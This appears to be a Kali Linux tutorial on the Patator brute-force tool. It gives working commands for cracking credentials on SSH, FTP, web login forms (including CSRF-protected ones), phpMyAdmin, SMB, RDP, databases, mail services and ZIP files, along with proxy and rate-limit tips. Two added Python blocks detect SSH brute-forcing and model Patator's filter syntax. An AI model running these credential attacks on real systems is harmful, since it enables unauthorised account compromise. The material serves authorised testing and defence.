Patator: A Versatile Password‑Cracking Toolkit for Kali Linux

Patator is a Python‑based brute‑force framework preinstalled in Kali Linux that offers precise success/failure filtering via its -x action system, supports over 36 modules for protocols such as SSH, FTP, HTTP, SMB, and provides advanced features like rate limiting, resume, encoding, and proxy support, making it a powerful alternative to tools like Hydra and Medusa.

Black & White Path

Installation & Startup

Patator is pre‑installed on Kali. Run patator -h to list modules. If missing, install with sudo apt install patator -y or build from source:

git clone https://github.com/lanjelot/patator.git
cd patator && python3 -m pip install -r requirements.txt

Available Modules

Patator ships with more than 36 modules, e.g. ftp_login, ssh_login, http_fuzz, smb_login, rdp_login, mysql_login, zipfile, dns_forward, …

Basic Usage

Modules accept parameters such as host, port, user, password, keyfile, etc. The generic syntax is:

patator <module> host=<target> user=FILE0 password=FILE1 0=<userlist> 1=<passlist>

SSH brute‑force example

patator ssh_login host=192.168.50.1 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt

Sample output shows the response code, size, time, candidate and message, e.g. 230 … Authentication successful. and 530 … Authentication failed.

Filtering failed attempts:

patator ssh_login host=192.168.50.1 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt \
  -x ignore:mesg='Authentication failed.'
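What the run above looks like from the server side, as an added detection example that is not part of the original article: a user list crossed with a password list produces many failures from one address across several accounts. The log format (classic OpenSSH syslog lines), the thresholds, the assumed year and all function names are assumptions; the sample lines are constructed and use a documentation address.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed format: classic OpenSSH syslog lines; the year is not logged, so one is assumed.
LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<kind>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def detect(lines, window=timedelta(minutes=5), max_fail=10, max_users=3, year=2024):
    """Return (kind, ip, detail) alerts; thresholds are illustrative, tune per site."""
    recent = defaultdict(deque)      # ip -> (timestamp, user) failures inside the window
    alerted, alerts = set(), []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, q = m["ip"], recent[m["ip"]]
        while q and ts - q[0][0] > window:
            q.popleft()              # forget failures older than the window
        if m["kind"] == "Failed":
            q.append((ts, m["user"]))
            users = {u for _, u in q}
            if ip not in alerted and (len(q) >= max_fail or len(users) >= max_users):
                alerted.add(ip)
                alerts.append(("bruteforce", ip, f"{len(q)} failures, {len(users)} users"))
        elif ip in alerted:          # a guess worked: treat the account as compromised
            alerts.append(("success_after_bruteforce", ip, m["user"]))
    return alerts

def constructed_sample():
    """Constructed log: 3 users x 4 passwords, one attempt per second, last one accepted."""
    out, t = [], datetime(2024, 1, 10, 3, 14, 0)
    for user in ("root", "admin", "deploy"):
        for _ in range(4):
            out.append(f"{t:%b %d %H:%M:%S} host sshd[811]: Failed password for {user} "
                       "from 203.0.113.7 port 40110 ssh2")
            t += timedelta(seconds=1)
    out[-1] = out[-1].replace("Failed", "Accepted")
    return out

if __name__ == "__main__":
    for alert in detect(constructed_sample()):
        print(alert)
```

The distinct-user threshold fires before the raw failure count does, which is what catches a slow, rate-limited run; the second alert type is the one that needs an immediate credential reset.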

The -x Action System

Syntax:

-x <action>[,<action>...]:<condition>=<value>[,<condition>=<value>...]

Supported actions:

ignore – do not report the result.

retry – retry the payload (e.g., on timeout or HTTP 500).

reset – disconnect and reconnect (unstable connections).

skip – skip the current user/keyword (e.g., account locked).

free – skip the current password (e.g., password triggers lockout).

quit – abort the scan immediately (e.g., WAF block).

Supported conditions (matched against the response):

code – status code (e.g., code=230 for successful SSH login).

size – response size (e.g., size=0).

time – response time (e.g., time=5- for >5 s).

mesg – exact message match (e.g., mesg='Login incorrect.').

fgrep – fuzzy substring containment (e.g., fgrep='Cannot log in').

egrep – regular‑expression match (e.g., egrep='error|failed').

clen – Content‑Length (HTTP only, e.g., clen=0).

Multiple -x options can be combined, for example:

patator http_fuzz url=http://192.168.50.1/FILE0 0=paths.txt \
  -x ignore:code=404 \
  -x ignore,reset,retry:code=500
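A simplified model of the -x grammar described above, added here as an example; it is not Patator's own code. The Response tuple and function names are hypothetical, comma-separated conditions are assumed to be ANDed, key!=value is treated as negation (as in the code!=0 usage later on this page), and clen is left out.

```python
import re
from collections import namedtuple

ACTIONS = {"ignore", "retry", "reset", "skip", "free", "quit"}
# Hypothetical stand-in for one result line: status code, size, seconds, message.
Response = namedtuple("Response", "code size time mesg")

def in_range(value, spec):
    """'5' is exact, '5-' at least 5, '-5' at most 5, '2-5' inclusive."""
    if "-" not in spec:
        return value == float(spec)
    lo, hi = spec.split("-", 1)
    return (not lo or value >= float(lo)) and (not hi or value <= float(hi))

MATCHERS = {
    "code": lambda r, v: r.code == v,
    "size": lambda r, v: in_range(r.size, v),
    "time": lambda r, v: in_range(r.time, v),
    "mesg": lambda r, v: r.mesg == v,
    "fgrep": lambda r, v: v in r.mesg,
    "egrep": lambda r, v: re.search(v, r.mesg) is not None,
}

def parse_rule(arg):
    """'ignore,retry:code=500' -> ({'ignore', 'retry'}, [('code', False, '500')])."""
    actions, _, conds = arg.partition(":")
    acts = set(actions.split(","))
    if not conds or not acts <= ACTIONS:
        raise ValueError(f"bad -x rule: {arg!r}")
    parsed = []
    for cond in conds.split(","):
        key, sep, value = cond.partition("=")
        negate, key = key.endswith("!"), key.rstrip("!")   # 'code!=0' negates
        if not sep or key not in MATCHERS:
            raise ValueError(f"bad condition: {cond!r}")
        parsed.append((key, negate, value))
    return acts, parsed

def actions_for(resp, rules):
    """Union of the actions of every rule whose conditions all match (AND assumed)."""
    fired = set()
    for arg in rules:
        acts, conds = parse_rule(arg)
        if all(MATCHERS[k](resp, v) != neg for k, neg, v in conds):
            fired |= acts
    return fired
```

A response that triggers no ignore rule is reported, so a reported line means "did not match a failure filter", not "login succeeded"; a lockout or block page that lacks the filtered string shows up the same way.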

Module‑Specific Examples

FTP brute‑force (custom port)

patator ftp_login host=192.168.50.66 port=2121 user=FILE0 password=FILE1 \
  0=/root/username.txt 1=/root/password.txt \
  -x ignore:mesg='Login incorrect.'

Additional usages:

Anonymous login:

patator ftp_login host=… user=anonymous password=anonymous

Fixed user, enumerate passwords:

patator ftp_login host=… user=admin password=FILE0 -x ignore:fgrep='Login incorrect'

FTPS (TLS): add tls=1

Common FTP return codes: 230 – login successful; 530 – login failed; 500 – server error.

HTTP fuzz (web directory scan)

patator http_fuzz url=http://192.168.50.1/FILE0 \
  0=/usr/share/wordlists/dirb/common.txt \
  -x ignore:code=404

HTTP login form brute‑force

patator http_fuzz url=http://192.168.50.1/login.php \
  method=POST \
  body='username=admin&password=FILE0&submit=Login' \
  0=/root/passwords.txt \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Login failed'

CSRF‑protected form

patator http_fuzz url=http://192.168.50.1/login.php \
  method=POST \
  body='csrf_token=TOKEN0&username=admin&password=FILE0' \
  0=/root/passwords.txt \
  before_urls=http://192.168.50.1/login.php \
  before_egrep='name="csrf_token" value="([^\"]+)"' \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Invalid CSRF token' \
  -x ignore:fgrep='Login failed'

phpMyAdmin brute‑force

patator http_fuzz url=http://192.168.50.1/pma/index.php \
  method=POST \
  body='pma_username=COMBO00&pma_password=COMBO01&server=1&target=index.php&lang=en' \
  0=/root/combos.txt \
  before_urls=http://192.168.50.1/pma/index.php \
  accept_cookie=1 follow=1 \
  -x ignore:fgrep='Cannot log in to the MySQL server'

HTTP Basic / NTLM authentication

# Basic auth
patator http_fuzz url=http://192.168.50.1/manager/html \
  user_pass=COMBO00:COMBO01 0=/root/combos.txt \
  -x ignore:code=401

# Custom Authorization header (Base64 encoding)
patator http_fuzz url=http://192.168.50.1/admin \
  header='Authorization: Basic _@@_FILE0_@@_' \
  0=/root/tokens.txt -e _@@_:b64 \
  -x ignore:code=401

Lateral‑movement modules

SMB – patator smb_login … -x ignore:fgrep='unknown user name or bad password'

RDP (NLA only) – patator rdp_login …

Database – MySQL, MSSQL, PostgreSQL, Oracle examples with appropriate -x ignore filters.

VNC – patator vnc_login …

SNMP – community brute‑force (v1/v2c) and v3 user enumeration/password cracking with -x ignore conditions.

Email service brute‑force

POP3 (plain/SSL) – -x ignore:code=-ERR

IMAP – -x ignore:code=NO

SMTP VRFY – -x ignore:fgrep='252'

SMTP RCPT TO – -x ignore:fgrep='550'

ZIP password cracking

patator unzip_pass zipfile=/root/kali.zip password=FILE0 \
  0=/root/zi.txt -x ignore:code!=0

Successful output contains code=0. Similar modules exist for Java keystore (keystore_pass) and SQLCipher (sqlcipher_pass).

DNS enumeration

Forward lookup (sub‑domain enumeration) – ignore code=3 (NXDOMAIN).

Reverse lookup (IP‑range scanning) – also ignore code=3 and optionally filter by domain.

IKE VPN scanning

patator ike_enum host=vpn.company.com \
  transform=MOD0 0=TRANS aggressive=RANGE1 1=int:0-1 \
  -x ignore:fgrep='NO-PROPOSAL'

Output reveals supported transforms such as 3DES, MD5, PSK.

Advanced Tips

Rate limiting – --rate-limit=1 for one request per second; -t 20 to set concurrency.

Resume scans – after Ctrl+C Patator prints a resume token; use --resume … to continue.

Encoding system – -e _@@_:b64, -e _@@_:url, etc., to transform dictionary values.

Result saving – -l /tmp/scan_results for full logs, --hits=/tmp/hits.txt for successful hits, --csv=/tmp/results.csv for CSV export.

Proxy support – proxy=127.0.0.1:8080 proxy_type=http or SOCKS5.

Patator vs. Hydra

Patator excels when precise success/failure control, CSRF token handling, resuming an interrupted scan, or custom encoding is required.

Hydra offers the widest protocol coverage (e.g., Redis, MongoDB) and is suitable for simple brute‑force tasks.

Key Takeaways

Use -x (e.g., -x ignore:fgrep='…') to keep output clean.

Log detailed results with -l /tmp/xxx for troubleshooting.

High‑quality dictionaries (rockyou.txt, SecLists) are the decisive factor for success.
